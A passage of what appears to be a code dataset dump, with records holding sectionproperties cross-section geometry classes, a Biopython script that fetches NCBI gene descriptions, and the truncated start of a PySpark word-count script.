geometry.create_mesh(mesh_sizes=[0.02])\n\n .. figure:: ../images/sections/taperedchannel_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. figure:: ../images/sections/taperedchannel_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r_r, r_f, alpha, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[t_w * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate alpha in radians\n alpha_rad = np.pi * alpha / 180\n\n # calculate the height of the flange toe and dimensions of the straight\n x1 = b * 0.5 - t_w * 0.5 - r_f * (1 - np.sin(alpha_rad))\n y1 = x1 * np.tan(alpha_rad)\n x2 = b * 0.5 - t_w * 0.5 - r_r * (1 - np.sin(alpha_rad))\n y2 = x2 * np.tan(alpha_rad)\n y_t = t_f - y1 - r_f * np.cos(alpha_rad)\n\n # add first two points\n self.points.append([0, 0])\n self.points.append([b, 0])\n\n # construct the bottom right flange toe radius\n if r_f == 0:\n self.points.append([b, y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom right root radius\n if r_r == 0:\n self.points.append([t_w, t_f + y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 / 2 * np.pi - alpha_rad) - (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = t_w + r_r + r_r * np.cos(theta)\n y = t_f + y2 + r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right root radius\n if r_r == 0:\n self.points.append([t_w, d - t_f - y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = np.pi - i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = t_w + r_r + r_r * np.cos(theta)\n y = d - t_f - y2 - r_r * np.cos(alpha_rad) + r_r * np.sin(\n theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right flange toe radius\n if r_f == 0:\n self.points.append([b, d - y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 * np.pi / 2 + alpha_rad) + (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = d - y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # add the final two points\n self.points.append([b, d])\n self.points.append([0, d])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass TeeSection(Geometry):\n \"\"\"Constructs a Tee section with the top left corner at *(0, d)*, with depth *d*, width *b*,\n flange thickness *t_f*, web thickness *t_w* and root radius *r*, using *n_r* points to\n construct the root radius.\n\n :param float d: Depth of the Tee section\n :param float b: Width of the Tee section\n :param float t_f: Flange thickness of the Tee section\n :param float t_w: Web thickness of the Tee section\n :param float r: Root radius of the Tee section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Tee section with a depth of 200, a width of 100, a flange\n thickness of 12, a web thickness of 6 and a root radius of 8, using 8 points to discretise the\n root radius. A mesh is generated with a maximum triangular area of 3.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.TeeSection(d=200, b=100, t_f=12, t_w=6, r=8, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[3.0])\n\n .. figure:: ../images/sections/tee_geometry.png\n :align: center\n :scale: 75 %\n\n Tee section geometry.\n\n .. figure:: ../images/sections/tee_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the TeeSection class.\"\"\"\n\n # assign control point\n control_points = [[b * 0.5, d - t_f * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first two points\n self.points.append([b * 0.5 - t_w * 0.5, 0])\n self.points.append([b * 0.5 + t_w * 0.5, 0])\n\n # construct the top right radius\n pt = [b * 0.5 + t_w * 0.5 + r, d - t_f - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add next four points\n self.points.append([b, d - t_f])\n self.points.append([b, d])\n self.points.append([0, d])\n self.points.append([0, d - t_f])\n\n # construct the top left radius\n pt = [b * 0.5 - t_w * 0.5 - r, d - t_f - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass AngleSection(Geometry):\n \"\"\"Constructs an angle section with the bottom left corner at the origin *(0, 0)*, with depth\n *d*, width *b*, thickness *t*, root radius *r_r* and toe radius *r_t*, using *n_r* points to\n construct the radii.\n\n :param float d: Depth of the angle section\n :param float b: Width of the angle section\n :param float t: Thickness of the angle section\n :param float r_r: Root radius of the angle section\n :param float r_t: Toe radius of the angle section\n :param int n_r: Number of points discretising the radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an angle section with a depth of 150, a width of 100, a thickness\n of 8, a root radius of 12 and a toe radius of 5, using 16 points to discretise the radii. A\n mesh is generated with a maximum triangular area of 2.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.AngleSection(d=150, b=100, t=8, r_r=12, r_t=5, n_r=16)\n mesh = geometry.create_mesh(mesh_sizes=[2.0])\n\n .. figure:: ../images/sections/angle_geometry.png\n :align: center\n :scale: 75 %\n\n Angle section geometry.\n\n .. figure:: ../images/sections/angle_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b, t, r_r, r_t, n_r, shift=[0, 0]):\n \"\"\"Inits the AngleSection class.\"\"\"\n\n # assign control point\n control_points = [[t * 0.5, t * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first two points\n self.points.append([0, 0])\n self.points.append([b, 0])\n\n # construct the bottom toe radius\n pt = [b - r_t, t - r_t]\n self.draw_radius(pt, r_t, 0, n_r)\n\n # construct the root radius\n pt = [t + r_r, t + r_r]\n self.draw_radius(pt, r_r, 1.5 * np.pi, n_r, False)\n\n # construct the top toe radius\n pt = [t - r_t, d - r_t]\n self.draw_radius(pt, r_t, 0, n_r)\n\n # add the next point\n self.points.append([0, d])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass CeeSection(Geometry):\n \"\"\"Constructs a Cee section with the bottom left corner at the origin *(0, 0)*, with depth *d*,\n width *b*, lip *l*, thickness *t* and outer radius *r_out*, using *n_r* points to construct the\n radius. If the outer radius is less than the thickness of the Cee Section, the inner radius is\n set to zero.\n\n :param float d: Depth of the Cee section\n :param float b: Width of the Cee section\n :param float l: Lip of the Cee section\n :param float t: Thickness of the Cee section\n :param float r_out: Outer radius of the Cee section\n :param int n_r: Number of points discretising the outer radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :raises Exception: Lip length must be greater than the outer radius\n\n The following example creates a Cee section with a depth of 125, a width of 50, a lip of 30, a\n thickness of 1.5 and an outer radius of 6, using 8 points to discretise the radius. A mesh is\n generated with a maximum triangular area of 0.25::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CeeSection(d=125, b=50, l=30, t=1.5, r_out=6, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[0.25])\n\n .. figure:: ../images/sections/cee_geometry.png\n :align: center\n :scale: 75 %\n\n Cee section geometry.\n\n .. figure:: ../images/sections/cee_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b, l, t, r_out, n_r, shift=[0, 0]):\n \"\"\"Inits the CeeSection class.\"\"\"\n\n # ensure the lip length is greater than the outer radius\n if l < r_out:\n raise Exception('Lip length must be greater than the outer radius')\n\n # assign control point\n control_points = [[t * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate internal radius\n r_in = max(r_out - t, 0)\n\n # construct the outer bottom left radius\n self.draw_radius([r_out, r_out], r_out, np.pi, n_r)\n\n # construct the outer bottom right radius\n self.draw_radius([b - r_out, r_out], r_out, 1.5 * np.pi, n_r)\n\n if r_out != l:\n # add next two points\n self.points.append([b, l])\n self.points.append([b - t, l])\n\n # construct the inner bottom right radius\n self.draw_radius([b - t - r_in, t + r_in], r_in, 0, n_r, False)\n\n # construct the inner bottom left radius\n self.draw_radius([t + r_in, t + r_in], r_in, 1.5 * np.pi, n_r, False)\n\n # construct the inner top left radius\n self.draw_radius([t + r_in, d - t - r_in], r_in, np.pi, n_r, False)\n\n # construct the inner top right radius\n self.draw_radius(\n [b - t - r_in, d - t - r_in], r_in, 0.5 * np.pi, n_r, False)\n\n if r_out != l:\n # add next two points\n self.points.append([b - t, d - l])\n self.points.append([b, d - l])\n\n # construct the outer top right radius\n self.draw_radius([b - r_out, d - r_out], r_out, 0, n_r)\n\n # construct the outer top left radius\n self.draw_radius([r_out, d - r_out], r_out, 0.5 * np.pi, n_r)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass ZedSection(Geometry):\n \"\"\"Constructs a Zed section with the bottom left corner at the origin *(0, 0)*, with depth *d*,\n left flange width *b_l*, right flange width *b_r*, lip *l*, thickness *t* and outer radius\n *r_out*, using *n_r* points to construct the radius. If the outer radius is less than the\n thickness of the Zed Section, the inner radius is set to zero.\n\n :param float d: Depth of the Zed section\n :param float b_l: Left flange width of the Zed section\n :param float b_r: Right flange width of the Zed section\n :param float l: Lip of the Zed section\n :param float t: Thickness of the Zed section\n :param float r_out: Outer radius of the Zed section\n :param int n_r: Number of points discretising the outer radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :raises Exception: Lip length must be greater than the outer radius\n\n The following example creates a Zed section with a depth of 100, a left flange width of 40, a\n right flange width of 50, a lip of 20, a thickness of 1.2 and an outer radius of 5, using 8\n points to discretise the radius. A mesh is generated with a maximum triangular area of 0.15::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.ZedSection(d=100, b_l=40, b_r=50, l=20, t=1.2, r_out=5, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[0.15])\n\n .. figure:: ../images/sections/zed_geometry.png\n :align: center\n :scale: 75 %\n\n Zed section geometry.\n\n .. figure:: ../images/sections/zed_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b_l, b_r, l, t, r_out, n_r, shift=[0, 0]):\n \"\"\"Inits the ZedSection class.\"\"\"\n\n # ensure the lip length is greater than the outer radius\n if l < r_out:\n raise Exception('Lip length must be greater than the outer radius')\n\n # assign control point\n control_points = [[t * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate internal radius\n r_in = max(r_out - t, 0)\n\n # construct the outer bottom left radius\n self.draw_radius([r_out, r_out], r_out, np.pi, n_r)\n\n # construct the outer bottom right radius\n self.draw_radius([b_r - r_out, r_out], r_out, 1.5 * np.pi, n_r)\n\n if r_out != l:\n # add next two points\n self.points.append([b_r, l])\n self.points.append([b_r - t, l])\n\n # construct the inner bottom right radius\n self.draw_radius([b_r - t - r_in, t + r_in], r_in, 0, n_r, False)\n\n # construct the inner bottom left radius\n self.draw_radius([t + r_in, t + r_in], r_in, 1.5 * np.pi, n_r, False)\n\n # construct the outer top right radius\n self.draw_radius([t - r_out, d - r_out], r_out, 0, n_r)\n\n # construct the outer top left radius\n self.draw_radius([t - b_l + r_out, d - r_out], r_out, 0.5 * np.pi, n_r)\n\n if r_out != l:\n # add the next two points\n self.points.append([t - b_l, d - l])\n self.points.append([t - b_l + t, d - l])\n\n # construct the inner top left radius\n self.draw_radius([2 * t - b_l + r_in, d - t - r_in], r_in, np.pi, n_r, False)\n\n # construct the inner top right radius\n self.draw_radius([-r_in, d - t - r_in], r_in, 0.5 * np.pi, n_r, False)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass CruciformSection(Geometry):\n \"\"\"Constructs a cruciform section centered at the origin *(0, 0)*, with depth *d*, width *b*,\n thickness *t* and root radius *r*, using *n_r* points to construct the root radius.\n\n :param float d: Depth of the cruciform section\n :param float b: Width of the cruciform section\n :param float t: Thickness of the cruciform section\n :param float r: Root radius of the cruciform section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a cruciform section with a depth of 250, a width of 175, a\n thickness of 12 and a root radius of 16, using 16 points to discretise the radius. A mesh is\n generated with a maximum triangular area of 5.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CruciformSection(d=250, b=175, t=12, r=16, n_r=16)\n mesh = geometry.create_mesh(mesh_sizes=[5.0])\n\n .. figure:: ../images/sections/cruciform_geometry.png\n :align: center\n :scale: 75 %\n\n Cruciform section geometry.\n\n .. figure:: ../images/sections/cruciform_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b, t, r, n_r, shift=[0, 0]):\n \"\"\"Inits the CruciformSection class.\"\"\"\n\n # assign control point\n control_points = [[0, 0]]\n\n super().__init__(control_points, shift)\n\n # add first two points\n self.points.append([-t * 0.5, -d * 0.5])\n self.points.append([t * 0.5, -d * 0.5])\n\n # construct the bottom right radius\n pt = [0.5 * t + r, -0.5 * t - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add the next two points\n self.points.append([0.5 * b, -t * 0.5])\n self.points.append([0.5 * b, t * 0.5])\n\n # construct the top right radius\n pt = [0.5 * t + r, 0.5 * t + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # add the next two points\n self.points.append([t * 0.5, 0.5 * d])\n self.points.append([-t * 0.5, 0.5 * d])\n\n # construct the top left radius\n pt = [-0.5 * t - r, 0.5 * t + r]\n self.draw_radius(pt, r, 0, n_r, False)\n\n # add the next two points\n self.points.append([-0.5 * b, t * 0.5])\n self.points.append([-0.5 * b, -t * 0.5])\n\n # construct the bottom left radius\n pt = [-0.5 * t - r, -0.5 * t - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass PolygonSection(Geometry):\n \"\"\"Constructs a regular hollow polygon section centered at *(0, 0)*, with a pitch circle\n diameter of bounding polygon *d*, thickness *t*, number of sides *n_sides* and an optional\n inner radius *r_in*, using *n_r* points to construct the inner and outer radii (if radii is\n specified).\n\n :param float d: Pitch circle diameter of the outer bounding polygon (i.e. diameter of circle\n that passes through all vertices of the outer polygon)\n :param float t: Thickness of the polygon section wall\n :param float r_in: Inner radius of the polygon corners. By default, if not specified, a polygon\n with no corner radii is generated.\n :param int n_r: Number of points discretising the inner and outer radii, ignored if no inner\n radii is specified\n :param rot: Initial counterclockwise rotation in degrees. By default bottom face is aligned\n with x axis.\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :raises Exception: Number of sides in polygon must be greater than or equal to 3\n\n The following example creates an Octagonal section (8 sides) with a diameter of 200, a\n thickness of 6 and an inner radius of 20, using 12 points to discretise the inner and outer\n radii. A mesh is generated with a maximum triangular area of 5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.PolygonSection(d=200, t=6, n_sides=8, r_in=20, n_r=12)\n mesh = geometry.create_mesh(mesh_sizes=[5])\n\n .. figure:: ../images/sections/polygon_geometry.png\n :align: center\n :scale: 75 %\n\n Octagonal section geometry.\n\n .. figure:: ../images/sections/polygon_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, t, n_sides, r_in=0, n_r=1, rot=0, shift=[0, 0]):\n \"\"\"Inits the PolygonSection class.\"\"\"\n\n if n_sides < 3:\n msg = 'n_sides required to be greater than 3 for PolygonSection class'\n raise Exception(msg)\n\n # initial rotation\n rot = rot * np.pi / 180 # radians\n\n # determine triangular segment angle\n alpha = 2 * np.pi / n_sides # radians\n\n # determine distance from origin to point perpendicular on face of side\n a_out = d / 2 * np.cos(alpha / 2)\n a_in = a_out - t\n\n # determine side length for outer & inner faces neglecting radii\n side_length_out = d * np.sin(alpha / 2)\n side_length_in = a_in / a_out * side_length_out\n\n # check limit on internal radii, if exceeded then radii merge to circle\n if r_in > a_in:\n r_in = a_in\n circle = True\n else:\n circle = False\n\n # calculate external radius, if r_in is zero, r_out also is zero\n if r_in == 0:\n r_out = 0\n n_r = 1\n else:\n r_out = r_in + t\n\n # equivalent side length of half the corner radii triangular segment\n c_out = r_out * (side_length_out / 2) / a_out\n c_in = r_in * (side_length_in / 2) / a_in\n\n # determine straight side length between corner radii (if present)\n side_length_straight_out = side_length_out - (2 * c_out)\n side_length_straight_in = side_length_in - (2 * c_in)\n\n # assign control point central on bottom side length & rotate to initial rotation specified\n control_points = [self.rotate([0, -a_out + t / 2], rot)]\n\n super().__init__(control_points, shift)\n\n # temp list for repeating geometry\n base_points = []\n\n # specify a hole in the centre of the Polygon section\n self.holes = [[0, 0]]\n\n # start at bottom face, constructing one corner radii, then rotate by initial rotation +\n # alpha and repeat for n_side number of times to form full section perimeter\n\n # construct the first radius (bottom right)\n for i in range(n_r):\n # determine polar angle\n theta = 1 / 2 * np.pi + i * 1.0 / max(1, n_r - 1) * alpha\n\n # calculate location of inner and outer points\n x_outer = side_length_straight_out / 2 - r_out * np.cos(theta)\n y_outer = -a_out + r_out - r_out * np.sin(theta)\n x_inner = side_length_straight_in / 2 - r_in * np.cos(theta)\n y_inner = -a_in + r_in - r_in * np.sin(theta)\n\n # append the current temporary points to the temporary points list\n base_points.append([x_outer, y_outer])\n base_points.append([x_inner, y_inner])\n\n # if radii merged to circle with an outer diameter of a_out then skip last point as causes\n # overlapping end points which causes meshing issues if geometry is not cleaned by user\n if circle:\n base_points = base_points[0:-2]\n\n # iterate and add subsequent corner radii one point at a time for each side\n for i in range(n_sides):\n for point in base_points:\n point_new = self.rotate(point, alpha * i + rot)\n self.points.append(point_new)\n\n # build the facet list\n num_points = int(len(self.points) / 2)\n for i in range(num_points):\n # if we are not at the last point\n if i != num_points - 1:\n self.facets.append([i * 2, i * 2 + 2])\n self.facets.append([i * 2 + 1, i * 2 + 3])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([i * 2, 0])\n self.facets.append([i * 2 + 1, 1])\n\n self.perimeter = list(range(0, len(self.facets), 2))\n\n self.shift_section()\n\n def rotate(self, point, angle):\n \"\"\"\n Rotate a point counterclockwise by a given angle around origin [0, 0]\n\n :param list point: Point coordinates to be rotated\n :param float angle: Angle to rotate point coordinates\n :return: Coordinates of rotated point\n :rtype: list[float, float]\n \"\"\"\n\n pt_x, pt_y = point\n\n c = np.cos(angle)\n s = np.sin(angle)\n\n new_x = c * pt_x - s * pt_y\n new_y = s * pt_x + c * pt_y\n\n return [new_x, new_y]\n\n\nclass BoxGirderSection(Geometry):\n \"\"\"Constructs a Box Girder section centered at at *(max(b_t, b_b)/2, d/2)*, with depth *d*, top\n width *b_t*, bottom width *b_b*, top flange thickness *t_ft*, bottom flange thickness *t_fb*\n and web thickness *t_w*.\n\n :param float d: Depth of the Box Girder section\n :param float b_t: Top width of the Box Girder section\n :param float b_b: Bottom width of the Box Girder section\n :param float t_ft: Top lange thickness of the Box Girder section\n :param float t_fb: Bottom flange thickness of the Box Girder section\n :param float t_w: Web thickness of the Box Girder section\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Box Gider section with a depth of 1200, a top width of 1200, a\n bottom width of 400, a top flange thickness of 16, a bottom flange thickness of 12 and a web\n thickness of 8. A mesh is generated with a maximum triangular area of 5.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.BoxGirderSection(d=1200, b_t=1200, b_b=400, t_ft=100, t_fb=80, t_w=50)\n mesh = geometry.create_mesh(mesh_sizes=[200.0])\n\n .. figure:: ../images/sections/box_girder_geometry.png\n :align: center\n :scale: 75 %\n\n Box Girder geometry.\n\n .. figure:: ../images/sections/box_girder_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b_t, b_b, t_ft, t_fb, t_w, shift=[0, 0]):\n \"\"\"Inits the BoxGirderSection class.\"\"\"\n\n # assign control point\n control_points = [[max(b_t, b_b) * 0.5, t_fb * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate central axis\n x_c = max(b_t, b_b) * 0.5\n\n # specify a hole in the centre of the Box Girder\n self.holes = [[x_c, d * 0.5]]\n\n # determine side wall angle\n if b_t < b_b:\n phi_b = np.arctan2(d, 0.5 * (b_b - b_t))\n phi_t = np.pi - phi_b\n else:\n phi_t = np.arctan2(d, 0.5 * (b_t - b_b))\n phi_b = np.pi - phi_t\n\n # determine inner wall x-offsets\n x_bot = t_fb / np.tan(np.pi - phi_b)\n x_top = t_ft / np.tan(np.pi - phi_t)\n web_x = abs(t_w / np.sin(np.pi - phi_b))\n\n # add outer points\n self.points.append([x_c - 0.5 * b_b, 0])\n self.points.append([x_c + 0.5 * b_b, 0])\n self.points.append([x_c + 0.5 * b_t, d])\n self.points.append([x_c - 0.5 * b_t, d])\n\n # add inner points\n self.points.append([x_c - 0.5 * b_b - x_bot + web_x, t_fb])\n self.points.append([x_c + 0.5 * b_b + x_bot - web_x, t_fb])\n self.points.append([x_c + 0.5 * b_t + x_top - web_x, d - t_ft])\n self.points.append([x_c - 0.5 * b_t - x_top + web_x, d - t_ft])\n\n # build facet list\n self.facets = [[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4]]\n self.perimeter = [0, 1, 2, 3]\n\n self.shift_section()\n\n\nclass MergedSection(Geometry):\n \"\"\"Merges a number of section geometries into one geometry. Note that for the meshing algorithm\n to work, there needs to be connectivity between all regions of the provided geometries.\n Overlapping of geometries is permitted.\n\n :param sections: A list of geometry objects to merge into one\n :class:`~sectionproperties.pre.sections.Geometry` object\n :type sections: list[:class:`~sectionproperties.pre.sections.Geometry`]\n\n The following example creates a combined cross-section with a 150x100x6 RHS placed on its side\n on top of a 200UB25.4. A mesh is generated with a maximum triangle size of 5.0 for the\n I-section and 2.5 for the RHS::\n\n import sectionproperties.pre.sections as sections\n\n isection = sections.ISection(d=203, b=133, t_f=7.8, t_w=5.8, r=8.9, n_r=8)\n box = sections.Rhs(d=100, b=150, t=6, r_out=15, n_r=8, shift=[-8.5, 203])\n\n geometry = sections.MergedSection([isection, box])\n geometry.clean_geometry()\n mesh = geometry.create_mesh(mesh_sizes=[5.0, 2.5])\n\n .. figure:: ../images/sections/merged_geometry.png\n :align: center\n :scale: 75 %\n\n Merged section geometry.\n\n .. figure:: ../images/sections/merged_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, sections):\n \"\"\"Inits the MergedSection class.\"\"\"\n\n super().__init__([], [0, 0])\n\n point_count = 0\n\n # loop through all sections\n for section in sections:\n # add facets\n for facet in section.facets:\n self.facets.append([facet[0] + point_count, facet[1] + point_count])\n\n # add points and count points\n for point in section.points:\n self.points.append([point[0], point[1]])\n point_count += 1\n\n # add holes\n for hole in section.holes:\n self.holes.append([hole[0], hole[1]])\n\n # add control points\n for control_point in section.control_points:\n self.control_points.append([control_point[0], control_point[1]])\n"} {"ext": "py", "sha": "1a30a24a49950f8e2efef573c74f8e3e2976113d", "content": "#!/usr/bin/env python\n\"\"\"\nFetch descriptions from NCBI given file with gene names.\n\nIntended to use on genes from Gene2Products.need-curating.txt\nfrom funannotate annotate formatted as single column, new line\nseparated text file.\n\nOutputs 2 column TSV ready for update-gene2products.py\n\nUsage: python grab_gene_descriptions.py \n\nCam Gilchrist\n2018-05-29\n\"\"\"\n\nimport sys\nfrom Bio import Entrez\nfrom collections import Counter\n\n# *Always* tell NCBI who you are\nEntrez.email = \"cameron.gilchrist@research.uwa.edu.au\"\n\ndef read_genes(gene_file):\n \"\"\"Read in list of gene names from \\n separated text file and\n return list.\"\"\"\n genes = []\n with open(gene_file, 'rU') as genefile:\n for gene in genefile:\n gene = gene.strip()\n genes.append(gene)\n return(genes)\n\ndef retrieve_descriptions(gene, descriptions, empties):\n \"\"\"Given single gene name, grab possible descriptions from NCBI\n and prompt user to select one\"\"\"\n\n # Perform ESearch and grab list of IDs\n query = gene + '[Gene Name]'\n handle = Entrez.esearch(db='gene', term=query,\n retmax=100,\n retmode='xml')\n record = Entrez.read(handle)\n handle.close()\n idlist = ','.join(record[\"IdList\"])\n\n # Ensure you have results, exit if not\n if idlist == '':\n print('No records for {}, skipping...\\n'.format(gene))\n empties.append(gene)\n return\n\n # Generate summary from UID list\n handle = Entrez.esummary(db='gene', id=idlist)\n record = Entrez.read(handle)\n handle.close()\n\n # Grab description, counter for unique values\n desc_cnt = Counter()\n doc_sums = record[u'DocumentSummarySet'][u'DocumentSummary']\n for i in range(len(doc_sums)):\n if doc_sums[i][u'NomenclatureName'] != '':\n desc = doc_sums[i][u'NomenclatureName']\n else:\n desc = doc_sums[i][u'OtherDesignations'].split('|')[0]\n desc_cnt[desc] += 1\n\n # Create list from counter keys for indexing purposes\n desc_list = filter(None, desc_cnt)\n if len(desc_cnt) > 1:\n print('{} has {} unique descriptions from {} results. These are:'.format(\n gene, len(desc_list), len(doc_sums)))\n ans_range = range(len(desc_list))\n for i in ans_range:\n print ('{}: {} [{}/{}]'.format(i+1, desc_list[i], desc_cnt[desc_list[i]], len(doc_sums)))\n\n # Take user input to accept/reject a description\n while True:\n ans = raw_input('Which do you accept? [{}-{}/N]: '.format(\n min(ans_range)+1, max(ans_range)+1))\n # Check if int or str entered\n try:\n ans = int(ans)-1\n if ans in ans_range:\n print('Accepting #{}.\\n'.format(ans+1))\n descriptions[gene] = desc_list[ans]\n break\n else:\n print('{} is outside acceptable range. Try again.'.format(\n ans))\n except:\n if ans in ['N', 'n', 'no', 'No']:\n print('Skipping this gene.\\n')\n break\n else:\n print('Invalid input, try again.')\n\n # If there's only one unique description, accept/reject\n elif len(desc_cnt) == 1:\n desc_list2 = list(desc_cnt)\n desc = desc_list2[0]\n if desc == '':\n print('{} has empty description.'.format(gene))\n empties.append(gene)\n return\n print('{} only has one unique description from {} results.'.format(\n gene, len(doc_sums)))\n print('This is:\\n{}'.format(desc))\n\n while True:\n ans = raw_input('Accept? Y/N: ')\n if ans in ['Y', 'y', 'yes', 'Yes']:\n print('Description accepted.\\n')\n descriptions[gene] = desc\n break\n elif ans in ['N', 'n', 'no', 'No']:\n print('Skipping this gene.\\n')\n empties.append(gene)\n break\n else:\n print('Invalid input, try again.')\n return(descriptions)\n\ndef print_descriptions(descriptions, outfile):\n \"\"\"Print descriptions as 2 column TSV for update-gene2products.py\"\"\"\n with open(outfile, 'w') as out:\n out.write('Empty descriptions:\\n')\n for gene in empties:\n out.write('{}\\n'.format(gene))\n out.write('\\nNon-empty descriptions:\\n')\n for gene in descriptions:\n out.write('{}\\t{}\\n'.format(gene, descriptions[gene]))\n\n# Read in genes from file and summarize\ngenes = read_genes(sys.argv[1])\nprint('There are {} genes in {}. These are:\\n{}\\n'.format(\n len(genes), sys.argv[1], ', '.join(genes))\n )\n\n# Fetch descriptions\nempties = []\ndescriptions = {}\nfor gene in genes:\n retrieve_descriptions(gene, descriptions, empties)\n\n# Write to output file given in second argument\nprint_descriptions(descriptions, sys.argv[2])\nprint('All done. Remember to check {} to correct errors or make adjustments!'.format(sys.argv[2]))\n"} {"ext": "py", "sha": "1a30a264b8b6d90a3872d7bd2541e30623e9d755", "content": "from pyspark import SparkContext, SparkConf\r\n\r\nif __name__ == \"__main__\":\r\n conf = SparkConf().setAppName(\"word count\").setMaster(\"local[3]\")\r\n\r\n # Spark Context\r\n sc = SparkContext(conf=conf)\r\n sc.setLogLevel(\"ERROR\")\r\n\r\n # Load input\r\n lines = sc.textFile(\"inputs/word_count.text\")\r\n\r\n # Split the sentences into words\r\n words = lines.flatMap(lambda line: line.split(\" \"))\r\n\r\n # Count occurrence of each word\r\n wordCounts = words.countByValue()\r\n\r\n # Print the 